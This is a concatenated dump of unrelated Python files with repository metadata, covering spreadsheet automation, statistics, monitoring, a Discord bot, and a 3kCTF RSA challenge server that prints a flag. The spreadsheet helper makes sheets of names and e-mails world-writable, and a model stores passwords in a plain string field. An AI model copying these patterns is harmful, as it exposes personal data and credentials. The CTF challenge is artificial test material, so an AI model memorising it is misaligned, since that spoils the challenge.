creds = sa_creds.from_json_keyfile_name(creds_file, scope)
self._client = gspread.authorize(creds)
def generate(self, title, worksheet_title='Teilnehmer',
header=('Vorname', 'Nachname', 'E-Mail')):
sh = self._client.create(title)
# make spreadsheet accessible to everyone via url
# also accessible for people without google account
sh.share(None, perm_type='anyone', role='writer')
# configure the first worksheet of the spreadsheet (index 0)
worksheet = sh.get_worksheet(0)
worksheet.append_row(header)
worksheet.update_title(worksheet_title)
# print(worksheet.row_values(1))
# worksheet.append_row(['Vorname', 'Nachname', 'E-Mail'])
return Spreadsheet(sh, worksheet)
def get(self, title):
sh = self._client.open(title)
worksheet = sh.get_worksheet(0)
return Spreadsheet(sh, worksheet)
def get_by_key(self, key):
sh = self._client.open_by_key(key)
worksheet = sh.get_worksheet(0)
return Spreadsheet(sh, worksheet)
class Spreadsheet(object):
def __init__(self, sh, worksheet):
self.sh = sh
self.worksheet = worksheet
self.url = 'https://docs.google.com/spreadsheets/d/%s' % sh.id
def get_data(self):
return self.worksheet.get_all_records()
| 35.45283 | 78 | 0.664715 |
9d09f33df7bb54978c9ad78e06bf86dc026107c3
| 127 |
py
|
Python
|
Online-Judges/DimikOJ/Python/03-falling-numbers.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/DimikOJ/Python/03-falling-numbers.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/DimikOJ/Python/03-falling-numbers.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
number = 1000
for i in range(1,201):
for j in range(1, 6):
print(number, end ="\t")
number -= 1
print()
| 21.166667 | 32 | 0.511811 |
a06e87374eededc329a872da467cdb5f0696d759
| 2,091 |
py
|
Python
|
.venv/Lib/site-packages/dexpy/box_behnken.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 21 |
2016-10-19T18:13:03.000Z
|
2021-11-02T13:58:31.000Z
|
.venv/Lib/site-packages/dexpy/box_behnken.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 43 |
2016-10-11T20:56:28.000Z
|
2020-08-20T16:39:38.000Z
|
.venv/Lib/site-packages/dexpy/box_behnken.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 6 |
2017-12-22T03:47:37.000Z
|
2021-03-13T03:45:26.000Z
|
"""Functions for building Box-Behnken designs."""
import dexpy.design as design
import pandas as pd
import numpy as np
import os
def build_box_behnken(factor_count, center_points = 5):
"""Builds a Box-Behnken design.create_model_matrix
Box-Behnken designs are response surface designs, specially made to require
only 3 levels, coded as -1, 0, and +1. Box-Behnken designs are available
for 3 to 21 factors. They are formed by combining two-level factorial
designs with incomplete block designs. This procedure creates designs with
desirable statistical properties but, most importantly, with only a
fraction of the experiments required for a three-level factorial. Because
there are only three levels, the quadratic model is appropriate.
**Center Points**
Center points, as implied by the name, are points with all levels set to
coded level 0 - the midpoint of each factor range: (0, 0)
Center points are usually repeated 4-6 times to get a good estimate of
experimental error (pure error).
**Categorical Factors**
You may also add categorical factors to this design. This will cause the
number of runs generated to be multiplied by the number of combinations of
the categorical factor levels.
Box, G.E.P., and Behnken, D.W., "Some New Three Level Designs for the Study
of Quantitative Variables", Technometrics, 2, pp. 455-475, 1960.
:param factor_count: The number of factors to build for.
:type factor_count: int
:param center_points: The number of center points to include in the design.
:type center_points: integer
"""
factor_names = design.get_factor_names(factor_count)
csv_path = os.path.join(os.path.dirname(__file__), "data", "BB_{:02d}.csv".format(factor_count))
factor_data = pd.read_csv(csv_path, names=factor_names)
if center_points > 0:
center_point_df = pd.DataFrame(0, columns=factor_names, index=np.arange(len(factor_data), len(factor_data) + center_points))
factor_data = factor_data.append(center_point_df)
return factor_data
| 41 | 132 | 0.738881 |
268a40b28b6bce9be9684d9c544b56ffbffcfb51
| 2,610 |
py
|
Python
|
python/csv_occurence_count.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 89 |
2015-02-13T13:46:06.000Z
|
2022-03-13T16:42:44.000Z
|
python/csv_occurence_count.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 91 |
2015-03-12T13:31:36.000Z
|
2022-01-14T07:37:37.000Z
|
python/csv_occurence_count.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 138 |
2015-03-04T15:23:43.000Z
|
2022-03-09T15:11:52.000Z
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import argparse
import codecs
from collections import OrderedDict
import sys
import openapc_toolkit as oat
ARG_HELP_STRINGS = {
"source_file": "The source csv file",
"count_column": "The numerical index of the column where values " +
"should be counted",
"encoding": "The encoding of the CSV file. Setting this argument will " +
"disable automatic guessing of encoding.",
"sort": "sort results by occurence count"
}
def main():
parser = argparse.ArgumentParser()
parser.add_argument("source_file", help=ARG_HELP_STRINGS["source_file"])
parser.add_argument("count_column", type=int, help=ARG_HELP_STRINGS["count_column"])
parser.add_argument("-e", "--encoding", help=ARG_HELP_STRINGS["encoding"])
parser.add_argument("-s", "--sort", action="store_true", help=ARG_HELP_STRINGS["sort"])
args = parser.parse_args()
enc = None
if args.encoding:
try:
codec = codecs.lookup(args.encoding)
msg = "Encoding '{}' found in Python's codec collection as '{}'"
print(msg.format(args.encoding, codec.name))
enc = args.encoding
except LookupError:
oat.print_r("Error: '" + args.encoding + "' not found Python's " +
"codec collection. Either look for a valid name here " +
"(https://docs.python.org/2/library/codecs.html#standard-" +
"encodings) or omit this argument to enable automated " +
"guessing.")
sys.exit()
header, content = oat.get_csv_file_content(args.source_file, enc)
column_name = "column " + str(args.count_column)
if header:
header_line = header[0]
column_name = header_line[args.count_column]
oat.print_g("Performing occurence count in column '" + column_name + "'")
occurence_dict = OrderedDict()
for line in content:
try:
value = line[args.count_column]
except IndexError as ie:
oat.print_y("IndexError ({}) at line {}, skipping...".format(ie.message, line))
continue
if value not in occurence_dict:
occurence_dict[value] = 1
else:
occurence_dict[value] += 1
if args.sort:
occurence_dict = OrderedDict(sorted(occurence_dict.items(), key=lambda x: x[1],
reverse=True))
for item in occurence_dict.items():
print(item[0] + ": " + str(item[1]))
if __name__ == '__main__':
main()
| 35.27027 | 91 | 0.603831 |
cd45ff18e5cab22c9aa35e16fd6dc9151e5ed80b
| 980 |
py
|
Python
|
customclient.py
|
Strange-Penguins/Stython
|
f4f96383681f311dd0ecceddf15417c78c974830
|
[
"MIT"
] | 1 |
2021-03-13T21:50:12.000Z
|
2021-03-13T21:50:12.000Z
|
customclient.py
|
Strange-Penguins/Stython
|
f4f96383681f311dd0ecceddf15417c78c974830
|
[
"MIT"
] | 4 |
2021-03-13T22:22:11.000Z
|
2021-03-14T22:17:49.000Z
|
customclient.py
|
Strange-Penguins/Stython
|
f4f96383681f311dd0ecceddf15417c78c974830
|
[
"MIT"
] | null | null | null |
from discord.ext.commands import Bot
import discord
from datetime import datetime
import platform
import databasemanager as dbm
class CustomClient(Bot):
def __init__(self, **options):
self.creation_date = datetime.now()
super().__init__(**options)
self.loop.create_task(self.greet())
self.db = dbm.DatabaseManager()
async def greet(self):
"""Prints Info one time on startup"""
await self.wait_until_ready()
now_date = datetime.now()
time_delta = now_date - self.creation_date
print(
f"----------\n[{now_date.strftime('%H:%M:%S')}] {self.user} started and connection established sucessfully."
f"(Took:{round(time_delta.microseconds / 1_000_000, 1)}sec)\n"
f">> Guilds: {[guild.name for guild in self.guilds]}\n"
f">> Running on {platform.system()} "
f"- Discord.py: {discord.__version__} - Python: {platform.python_version()}"
)
| 35 | 120 | 0.62551 |
f846bc0871bba8028e0117e09f0110f19b20bd95
| 811 |
py
|
Python
|
apps/utils/nodemgr.py
|
dongdawang/ssrmgmt
|
a41e595aec503dcb191a20ea8d58233bbb8f2db0
|
[
"MIT"
] | null | null | null |
apps/utils/nodemgr.py
|
dongdawang/ssrmgmt
|
a41e595aec503dcb191a20ea8d58233bbb8f2db0
|
[
"MIT"
] | null | null | null |
apps/utils/nodemgr.py
|
dongdawang/ssrmgmt
|
a41e595aec503dcb191a20ea8d58233bbb8f2db0
|
[
"MIT"
] | null | null | null |
from django.core.cache import cache
class NodeStatusCacheMgr(object):
def __init__(self):
pass
def set_node_status(self, id, status):
key = "ssrmgmt_node_status_" + str(id)
if status:
val = 'online'
else:
val = 'offline'
cache.set(key, val, 80)
def get_node_status(self, id):
key = "ssrmgmt_node_status_" + str(id)
if key in cache:
return cache.get(key)
else:
return 'offline'
def set_port_ips(self, port, ips: list):
key = "ssrmgmt_port_status_" + str(port)
cache.set(key, ips, 80)
def get_port_ips(self, port):
key = "ssrmgmt_port_status_" + str(port)
if key in cache:
return cache.get(key)
else:
return []
| 24.575758 | 48 | 0.553637 |
3e34a3ee4a65e0ac70b41bf3151a26c8b3ce1fce
| 6,781 |
py
|
Python
|
official/cv/brdnet/infer/sdk/main.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/brdnet/infer/sdk/main.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/brdnet/infer/sdk/main.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
'''
The scripts to execute sdk infer
'''
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import argparse
import os
import glob
import time
import math
import PIL.Image as Image
import MxpiDataType_pb2 as MxpiDataType
import numpy as np
from StreamManagerApi import StreamManagerApi, InProtobufVector, \
MxProtobufIn, StringVector
def parse_args():
"""set and check parameters."""
parser = argparse.ArgumentParser(description="BRDNet process")
parser.add_argument("--pipeline", type=str, default=None, help="SDK infer pipeline")
parser.add_argument("--clean_image_path", type=str, default=None, help="root path of image without noise")
parser.add_argument('--image_width', default=500, type=int, help='resized image width')
parser.add_argument('--image_height', default=500, type=int, help='resized image height')
parser.add_argument('--channel', default=3, type=int
, help='image channel, 3 for color, 1 for gray')
parser.add_argument('--sigma', type=int, default=15, help='level of noise')
args_opt = parser.parse_args()
return args_opt
def calculate_psnr(image1, image2):
image1 = np.float64(image1)
image2 = np.float64(image2)
diff = image1 - image2
diff = diff.flatten('C')
rmse = math.sqrt(np.mean(diff**2.))
return 20*math.log10(1.0/rmse)
def send_source_data(appsrc_id, tensor, stream_name, stream_manager):
"""
Construct the input of the stream,
send inputs data to a specified stream based on streamName.
Returns:
bool: send data success or not
"""
tensor_package_list = MxpiDataType.MxpiTensorPackageList()
tensor_package = tensor_package_list.tensorPackageVec.add()
array_bytes = tensor.tobytes()
tensor_vec = tensor_package.tensorVec.add()
tensor_vec.deviceId = 0
tensor_vec.memType = 0
for i in tensor.shape:
tensor_vec.tensorShape.append(i)
tensor_vec.dataStr = array_bytes
tensor_vec.tensorDataSize = len(array_bytes)
key = "appsrc{}".format(appsrc_id).encode('utf-8')
protobuf_vec = InProtobufVector()
protobuf = MxProtobufIn()
protobuf.key = key
protobuf.type = b'MxTools.MxpiTensorPackageList'
protobuf.protobuf = tensor_package_list.SerializeToString()
protobuf_vec.push_back(protobuf)
ret = stream_manager.SendProtobuf(stream_name, appsrc_id, protobuf_vec)
if ret < 0:
print("Failed to send data to stream.")
return False
return True
def main():
"""
read pipeline and do infer
"""
args = parse_args()
# init stream manager
stream_manager_api = StreamManagerApi()
ret = stream_manager_api.InitManager()
if ret != 0:
print("Failed to init Stream manager, ret=%s" % str(ret))
return
# create streams by pipeline config file
with open(os.path.realpath(args.pipeline), 'rb') as f:
pipeline_str = f.read()
ret = stream_manager_api.CreateMultipleStreams(pipeline_str)
if ret != 0:
print("Failed to create Stream, ret=%s" % str(ret))
return
stream_name = b'brdnet'
infer_total_time = 0
psnr = [] #after denoise
image_list = glob.glob(os.path.join(args.clean_image_path, '*'))
if not os.path.exists("./outputs"):
os.makedirs("./outputs")
with open("./outputs/denoise_results.txt", 'w') as f:
for image in sorted(image_list):
print("Denosing image:", image)# read image
if args.channel == 3:
img_clean = np.array(Image.open(image).resize((args.image_width, args.image_height), \
Image.ANTIALIAS), dtype='float32') / 255.0
else:
img_clean = np.expand_dims(np.array(Image.open(image).resize((args.image_width, \
args.image_height), Image.ANTIALIAS).convert('L'), dtype='float32') / 255.0, axis=2)
np.random.seed(0) #obtain the same random data when it is in the test phase
img_test = img_clean + np.random.normal(0, args.sigma/255.0, img_clean.shape).astype(np.float32)#HWC
noise_image = np.expand_dims(img_test.transpose((2, 0, 1)), 0)#NCHW
if not send_source_data(0, noise_image, stream_name, stream_manager_api):
return
# Obtain the inference result by specifying streamName and uniqueId.
key_vec = StringVector()
key_vec.push_back(b'modelInfer')
start_time = time.time()
infer_result = stream_manager_api.GetProtobuf(stream_name, 0, key_vec)
infer_total_time += time.time() - start_time
if infer_result.size() == 0:
print("inferResult is null")
return
if infer_result[0].errorCode != 0:
print("GetProtobuf error. errorCode=%d" % (infer_result[0].errorCode))
return
result = MxpiDataType.MxpiTensorPackageList()
result.ParseFromString(infer_result[0].messageBuf)
res = np.frombuffer(result.tensorPackageVec[0].tensorVec[0].dataStr, dtype='<f4')
y_predict = res.reshape(args.channel, args.image_height, args.image_width)
img_out = y_predict.transpose((1, 2, 0))#HWC
img_out = np.clip(img_out, 0, 1)
psnr_denoised = calculate_psnr(img_clean, img_out)
psnr.append(psnr_denoised)
print(image, ": psnr_denoised: ", " ", psnr_denoised)
print(image, ": psnr_denoised: ", " ", psnr_denoised, file=f)
filename = image.split('/')[-1].split('.')[0] # get the name of image file
img_out.tofile(os.path.join("./outputs", filename+'_denoise.bin'))
psnr_avg = sum(psnr)/len(psnr)
print("Average PSNR:", psnr_avg)
print("Average PSNR:", psnr_avg, file=f)
print("Testing finished....")
print("=======================================")
print("The total time of inference is {} s".format(infer_total_time))
print("=======================================")
# destroy streams
stream_manager_api.DestroyAllStreams()
if __name__ == '__main__':
main()
| 40.849398 | 112 | 0.641203 |
9042573579966f12375d19d6a86769ffe339bb69
| 416 |
py
|
Python
|
PMIa/2014/danilov_d_a/task_2_6.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2014/danilov_d_a/task_2_6.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2014/danilov_d_a/task_2_6.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
#Задача 2. Вариант 6.
#Напишите программу, которая будет выводить на экран наиболее понравившееся вам высказывание, автором которого является Иисус Христос. Не забудьте о том, что автор должен быть упомянут на отдельной строке.
#Данилов Д.А.
#20.05.2016
input("Не думайте, что Я пришел принести мир на землю; не мир пришел Я принести, но меч.\n\n\n\t\t\t\t\t Иисус Христос \n\n\nНажмите Enter для завершения")
| 69.333333 | 206 | 0.766827 |
5f3b93cf85a7fe66bdfadbd695beb1d00ffe6c81
| 1,693 |
py
|
Python
|
scripts/pip_sequential.py
|
guruvamsi-policharla/noisy-krotov
|
c5397d9dbde68d06f17e88620d6a6b2c74664841
|
[
"BSD-3-Clause"
] | 49 |
2018-11-07T06:43:33.000Z
|
2022-03-18T20:53:06.000Z
|
scripts/pip_sequential.py
|
guruvamsi-policharla/noisy-krotov
|
c5397d9dbde68d06f17e88620d6a6b2c74664841
|
[
"BSD-3-Clause"
] | 94 |
2018-11-06T20:15:04.000Z
|
2022-01-06T09:06:15.000Z
|
scripts/pip_sequential.py
|
qucontrol/krotov
|
9f9a22336c433dc3a37637ce8cc8324df4290b46
|
[
"BSD-3-Clause"
] | 20 |
2018-11-06T20:03:11.000Z
|
2022-03-12T05:29:21.000Z
|
#!/usr/bin/env python
"""Stand-in for pip that processes packages sequentially.
`pip install <packages>` compiles *all* the given packages before installing
them. This can be a problem if the compilation of one package depends on other
packages being installed (most likely, cython/numpy). This script provides an
ad-hoc solution by translating `pip install <packages` into a sequential `pip
install <package>` for every package in <packages>. It can be used in tox.ini
as
install_command=
python scripts/pip_sequential.py install {opts} -- {packages}
"""
import subprocess
import sys
def main(argv=None):
"""Main function"""
if argv is None:
argv = sys.argv
command = 'help'
options = []
args = []
if len(argv) > 1 and not argv[1].startswith('-'):
command = argv[1]
bucket = options
for arg in argv[2:]:
if arg == '--':
# everything before '--' is definitely an option, everything
# afterwards *may* be an arg
bucket = args
else:
if arg.startswith('-'):
options.append(arg)
else:
bucket.append(arg)
if len(args) == 0:
print("Usage: %s command [options] -- <specs>" % __file__)
return 1
try:
for arg in args:
cmd = [sys.executable, '-m', 'pip', command, *options, arg]
print(" ".join(cmd))
subprocess.run(cmd, check=True)
except subprocess.CalledProcessError as exc_info:
print("ERROR: %s" % exc_info)
return 1
else:
return 0
if __name__ == '__main__':
sys.exit(main())
| 30.232143 | 78 | 0.583579 |
5f4bcc06cf34f85942da00f7dbf95407df0df76d
| 724 |
py
|
Python
|
20-fs-ias-lec/groups/13-sneakernet/code/logMerge/LogMergeTests.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
20-fs-ias-lec/groups/13-sneakernet/code/logMerge/LogMergeTests.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
20-fs-ias-lec/groups/13-sneakernet/code/logMerge/LogMergeTests.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
# Tests for LogMerge.py
# Authors: Günes Aydin, Joey Zgraggen, Nikodem Kernbach
# VERSION: 1.0
import os
import unittest
import LogMerge
class LogMergeTests(unittest.TestCase):
def setUp(self):
self.lm = LogMerge.LogMerge()
def test_something_1(self):
pass
def test_something_2(self):
pass
@classmethod
def tearDownClass(cls): # Deletes testing files
(_, _, filenames) = next(os.walk(os.getcwd()))
for filename in filenames:
if filename.endswith('.key') or filename.endswith('.sqlite') or filename.endswith('.pcap'):
os.remove(filename)
if __name__ == '__main__':
# Run all tests from inside this file
unittest.main()
| 22.625 | 103 | 0.650552 |
39b790ec8e13aec6264fe2ddd36eec5e5a854cd2
| 2,699 |
py
|
Python
|
Aufgaben/abgabe1.py
|
JoshuaJoost/GNN_SS20
|
6b905319f2e51b71569354c347805abce9df3cb1
|
[
"MIT"
] | null | null | null |
Aufgaben/abgabe1.py
|
JoshuaJoost/GNN_SS20
|
6b905319f2e51b71569354c347805abce9df3cb1
|
[
"MIT"
] | null | null | null |
Aufgaben/abgabe1.py
|
JoshuaJoost/GNN_SS20
|
6b905319f2e51b71569354c347805abce9df3cb1
|
[
"MIT"
] | null | null | null |
#Run cell
#%%
__authors__ = "Rosario Allegro (1813064), Sedat Cakici (1713179), Joshua Joost (1626034)"
# maintainer = who fixes buggs?
__maintainer = __authors__
__date__ = "2020-04-21"
__version__ = "0.5"
__status__ = "Test"
import numpy as np
import matplotlib
from matplotlib import pyplot as plt
print(f"numpy_version: {np.version.version}")
print(f"matplotlib version: {matplotlib.__version__}")
## Value specifications Task 1 --------------------------------
# Don't change this values
DELTA_T = 0.01
X_VALUES = np.array([-7.0, -0.2, 8.0])
## static diagram values --------------------------------------
# Points to sample the curve
numberOfSamplePoints = 64
# diagram dimensions, have to be constant 2
DIAG_DIM = 2
# diagram range
xMin = -4
xMax = 4
# y value function
yFunc = lambda x: x - (x ** 3)
## delta train function ------------------------------------------
trainSamplingPoints = numberOfSamplePoints
deltaLernFunc = lambda x, delta_t: x + delta_t * (x - x ** 3)
def generateTrainValues(startValue, trainIterations = trainSamplingPoints, trainFunc = deltaLernFunc):
trainValues = np.zeros(trainIterations)
trainValues[0] = trainFunc(startValue, DELTA_T)
for i in range(1, trainIterations):
trainValues[i] = trainFunc(trainValues[i-1], DELTA_T)
return trainValues
## Calculate plot values ----------------------------------------
# initialise diagram values array
pltValues = np.zeros((DIAG_DIM, numberOfSamplePoints))
# generate xValues
pltValues[0] = np.linspace(xMin, xMax, numberOfSamplePoints, endpoint=True)
# generate yValues
for yi in range(numberOfSamplePoints):
pltValues[1][yi] = yFunc(pltValues[0][yi])
# print(pltValues)
## Calculate delta train values --------------------------------
trainValues = np.zeros((X_VALUES.size, trainSamplingPoints))
for i in range(X_VALUES.size):
trainValues[i] = generateTrainValues(X_VALUES[i])
#print(trainValues)
## plot diagram --------------------------------------------------
xMinValue = xMin
xMaxValue = xMax
yMinValue = np.min(pltValues[1])
yMaxValue = np.max(pltValues[1])
plt.plot(pltValues[0], pltValues[1], label = 'basic function')
plt.plot(pltValues[0], trainValues[0], marker='o', markersize=2, color='green', label=X_VALUES[0], alpha=0.8)
plt.plot(pltValues[0], trainValues[1], marker='o', markersize=2, color='red', label=X_VALUES[1], alpha=0.8)
plt.plot(pltValues[0], trainValues[2], marker='o', markersize=2, color='blue', label=X_VALUES[2], alpha=0.8)
plt.axis([xMinValue, xMaxValue, yMinValue + (yMinValue / 10), yMaxValue + (yMaxValue / 10)])
plt.legend()
plt.show()
# Attraktor läuft auf einen Fixpunkt zu (in Richtung des Wertes des Sattelpunkts y = 0)
| 32.130952 | 109 | 0.665061 |
f2cc69939b09b877533ade341e1e1b76b0a02782
| 1,568 |
py
|
Python
|
monitoring/zabbix/zabbix_collections/ssdb/ssdb.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 63 |
2018-02-04T03:31:22.000Z
|
2022-03-07T08:27:39.000Z
|
monitoring/zabbix/zabbix_collections/ssdb/ssdb.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 3 |
2020-06-15T03:41:03.000Z
|
2020-06-15T03:41:04.000Z
|
monitoring/zabbix/zabbix_collections/ssdb/ssdb.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 40 |
2018-01-22T16:31:16.000Z
|
2022-03-08T04:40:42.000Z
|
#!/bin/env python
import sys,json,socket,re
from SSDB import SSDB
def get_stats(ip,port):
ssdb = SSDB(ip, port)
info = ssdb.request('info',['cmd'])
result= info.data[1:]
return result
def discovery_cmd(info):
d={'data':[]}
for i in range(0,len(info),2):
if info[i].find('cmd') != -1:
d['data'].append({'{#SSDBCMD}':info[i]})
return json.dumps(d)
def check(ip,port):
ssdb = SSDB(ip, port)
try:
ssdb.request('set', ['zabbix', '123'])
ssdb.request('get', ['zabbix'])
return 1
except:
return 0
if __name__ == '__main__':
ip = socket.gethostbyname(socket.getfqdn(socket.gethostname()))
port = 8888
stats = get_stats(ip,port)
res = {}
for i in range(0,len(stats),2):
if stats[i] == 'replication':
stats[i] = stats[i]+'.'+stats[i+1].split()[0]
res[stats[i]] = stats[i+1]
cmd = sys.argv[1]
filter = sys.argv[2] if len(sys.argv) > 2 else ''
if cmd == 'discover':
print discovery_cmd(stats)
elif cmd.find('cmd') != -1:
p = re.compile('(\w+):\s+(\d+)\s+(\w+):\s+(\d+)\s+(\w+):\s+(\d+)')
m = p.match(res[cmd])
d=dict(zip(m.group(1,3,5),m.group(2,4,6)))
#print d[filter]
print d.get(filter,'not support')
elif cmd == 'replication.client':
for i in res['replication.client'].split('\n'):
if i.split(':')[0].strip() == filter:
print i.split(':')[1].strip()
elif cmd == 'binlogs':
print res['binlogs'].split('\n')[-1].split(':')[-1].strip()
elif cmd == 'available':
print check(ip,port)
else:
print res.get(cmd,'not support')
| 26.133333 | 70 | 0.571429 |
840126f73a90b431b76708cb45f3372a479f93d6
| 1,744 |
py
|
Python
|
BluePrint/apps/models.py
|
CodeMath/jinrockets
|
6bb26e9ca66ba951ab2d34bf1ffe79b2c605963f
|
[
"MIT"
] | null | null | null |
BluePrint/apps/models.py
|
CodeMath/jinrockets
|
6bb26e9ca66ba951ab2d34bf1ffe79b2c605963f
|
[
"MIT"
] | null | null | null |
BluePrint/apps/models.py
|
CodeMath/jinrockets
|
6bb26e9ca66ba951ab2d34bf1ffe79b2c605963f
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
from apps import db
class User(db.Model):
id = db.Column(db.String(255), primary_key=True)
password = db.Column(db.String(255))
date = db.Column(db.DateTime(), default=db.func.now())
# 회원가입 당 시, 정보 입력(청소년,신입생,복학생,취준생,직장인)
user_category=db.Column(db.String(255),default="신입생")
input_jobs=db.Column(db.String(255),default="0")
class Job(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.String(255), db.ForeignKey(User.id))
user = db.relationship('User', backref=db.backref('jobs', cascade='all, delete-orphan'))
write_date = db.Column(db.DateTime(), default=db.func.now())
# 분과
department=db.Column(db.String(255))
# 전공
major=db.Column(db.String(255),default=u"없음")
# 닉네임
nic_name=db.Column(db.String(255),default=u"진로켓 유저")
# 진로
job=db.Column(db.String(255),default=u"없음")
# 학과 한 줄평
major_comment=db.Column(db.String(255),default=u"좋습니다.")
# 학과 이야기
major_story=db.Column(db.Text(65535),default=u"학과 분위기와 진로등 모두 만족합니다.")
# 학과 만족도
major_like=db.Column(db.String(255))
# 복수전공 유무(y/n)
check_double_major=db.Column(db.String(255))
# 복수전공 과목
double_major=db.Column(db.String(255),default=u"없음")
# 진로를 선택하게 된 이유
job_reason=db.Column(db.Text(65535),default=u"일반적으로 가는 진로라서 선택하였습니다.")
# 진로와의 상관관계 점수(전공/자격증/복수전공/대외활동/독서)
# 전공 공부
point_major=db.Column(db.String(255))
# 자격증
point_licence=db.Column(db.String(255))
# 복수전공
point_double_major=db.Column(db.String(255))
# 독서
point_reading=db.Column(db.String(255))
# 대외활동
point_extra=db.Column(db.String(255))
# 추가 사항(1~2) 우선 해당 내용 추가 안함. 오픈베타 시작 후 ajax이용해서 비동기식
point_ex_1=db.Column(db.String(255))
point_ex_2=db.Column(db.String(255))
def json_dump(self):
return dict(job=self.job, count=0)
| 27.68254 | 89 | 0.704702 |
0809a3852e9f6c2b9f483631e41f0fee6c21f877
| 1,737 |
py
|
Python
|
3kCTF/2021/crypto/ASR/app.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
3kCTF/2021/crypto/ASR/app.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
3kCTF/2021/crypto/ASR/app.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
import binascii
import hashlib
import random
import os
import string
import OpenSSL.crypto as crypto
rsa_p_not_prime_pem = """\n-----BEGIN RSA PRIVATE KEY-----\nMBsCAQACAS0CAQcCAQACAQ8CAQMCAQACAQACAQA=\n-----END RSA PRIVATE KEY-----\n"""
invalid_key = crypto.load_privatekey(crypto.FILETYPE_PEM, rsa_p_not_prime_pem)
error_msg = "Pycrypto needs to be patched!"
try:
invalid_key.check()
raise RuntimeError(error_msg)
except crypto.Error:
pass
# proof of work to prevent any kind of bruteforce :-)
prefix = "".join(random.choice(string.ascii_lowercase) for _ in range(6))
print("Find a string s such that sha256(prefix + s) has 24 binary leading zeros. Prefix = '{}'".format(prefix))
pow_answer = input("Answer: ")
assert hashlib.sha256((prefix + pow_answer).encode()).digest()[:3] == b"\x00\x00\x00"
# v v v challenge starts here v v v
print("\n\nHello, i hope you can help me out. I might reward you something in return :D")
key = ""
# read in key
while True:
buffer = input()
if buffer:
key += buffer + "\n"
else:
break
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key)
private_numbers = key.to_cryptography_key().private_numbers()
assert key.check()
d = private_numbers.d
p = private_numbers.p
q = private_numbers.q
N = p * q
# i dont like small numbers
assert d > 1337 * 1337 * 1337 * 1337 * 1337
# and i dont like even numbers
assert N % 2 != 0
if pow(820325443930302277, d, N) == 4697802211516556112265788623731306453433385478626600383507434404846355593172244102208887127168181632320398894844742461440572092476461783702169367563712341297753907259551040916637774047676943465204638648293879569:
with open("flag") as fd:
print(fd.read())
else:
print("Nop. :(")
